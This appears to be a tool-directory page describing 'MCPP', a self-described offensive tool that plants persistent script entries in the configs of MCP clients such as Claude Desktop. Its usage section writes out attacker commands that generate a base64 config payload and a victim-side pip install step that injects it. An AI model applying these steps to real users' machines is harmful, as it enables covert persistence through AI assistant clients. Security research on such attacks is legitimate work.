Mcpp
What is Mcpp
MCPP is a tool designed for persistent payload delivery utilizing various MCP clients. It allows users to execute scripts on a victim’s machine by leveraging the capabilities of those clients, ensuring that the payloads remain effective and retrievable after initial execution.
Use cases
MCPP can be employed in penetration testing environments or ethical hacking situations where users need to demonstrate vulnerabilities related to payload delivery and script execution. It provides a controlled mechanism for educational purposes, highlighting security weaknesses in scripts and client applications.
How to use
To use MCPP, an attacker must edit the gen_payload.py script to modify the configurations according to their needs, then execute it to generate a payload. This payload is then exported with specific environment variables which the victim can run to install the necessary configurations for the desired functionality.
Key features
Key features of MCPP include easy installation, support for various MCP clients such as Claude Desktop and 5ire, persistent functionality through configuration and script dependencies, and plans for additional support for Node.js clients. It does not aim for obfuscation of the payloads.
Where to use
MCPP can be used in environments where interaction with MCP clients is relevant, including research labs, security audits, or educational platforms that demonstrate the implications of persistent payload installations in software systems.
Clients Supporting MCP
The following are the main client software that supports the Model Context Protocol. Click the link to visit the official website for more information.
Overview
What is Mcpp
MCPP is a tool designed for persistent payload delivery utilizing various MCP clients. It allows users to execute scripts on a victim’s machine by leveraging the capabilities of those clients, ensuring that the payloads remain effective and retrievable after initial execution.
Use cases
MCPP can be employed in penetration testing environments or ethical hacking situations where users need to demonstrate vulnerabilities related to payload delivery and script execution. It provides a controlled mechanism for educational purposes, highlighting security weaknesses in scripts and client applications.
How to use
To use MCPP, an attacker must edit the gen_payload.py script to modify the configurations according to their needs, then execute it to generate a payload. This payload is then exported with specific environment variables which the victim can run to install the necessary configurations for the desired functionality.
Key features
Key features of MCPP include easy installation, support for various MCP clients such as Claude Desktop and 5ire, persistent functionality through configuration and script dependencies, and plans for additional support for Node.js clients. It does not aim for obfuscation of the payloads.
Where to use
MCPP can be used in environments where interaction with MCP clients is relevant, including research labs, security audits, or educational platforms that demonstrate the implications of persistent payload installations in software systems.
Clients Supporting MCP
The following are the main client software that supports the Model Context Protocol. Click the link to visit the official website for more information.
Content
mcpp
The “P” in MCP is for Persistent.
Features
- Easy install
- Supports various MCP clients.
- Claude Desktop
- 5ire
- (TODO: Comming soon)
- Persistent via
- Config
- Dependency of the scripts (
.py) - TODO: Dependency of the scripts (
.pyc)
- (TODO: Support
nodetoo?)
Non-goals
- Obfuscation
Usage
(attacker)❯ vim gen_payload.py # change the `configs` inside the script (attacker)❯ python gen_payload.py export I_KNOW_WHAT_I_AM_DOING_AND_THIS_IS_FOR_EDUCATIONAL_PURPOSES_ONLY=1 export MCPP='ClaudeDesktop:add_entry:eyJrZXkiOiAiU2VhcmNoIiwgImNvbW1hbmQiOiAicHl0aG9uIiwgImFyZ3MiOiBbInBhdGhfdG9fc2NyaXB0LnB5IiwgImFyZzEiLCAiYXJnMiJdfQ==:CBCE9547' name='ClaudeDesktop', operation='add_entry' {'key': 'Search', 'command': 'python', 'args': ['path_to_script.py', 'arg1', 'arg2']}
Victim
(victim)❯ export I_KNOW_WHAT_I_AM_DOING_AND_THIS_IS_FOR_EDUCATIONAL_PURPOSES_ONLY=1 export MCPP='ClaudeDesktop:add_entry:eyJrZXkiOiAiU2VhcmNoIiwgImNvbW1hbmQiOiAicHl0aG9uIiwgImFyZ3MiOiBbInBhdGhfdG9fc2NyaXB0LnB5IiwgImFyZzEiLCAiYXJnMiJdfQ==:CBCE9547' (victim)❯ pip install git+https://github.com/rand-tech/mcpp.git # This will add the base64-ed config to the claude desktop config. (victim)❯
Dev Tools Supporting MCP
The following are the main code editors that support the Model Context Protocol. Click the link to visit the official website for more information.
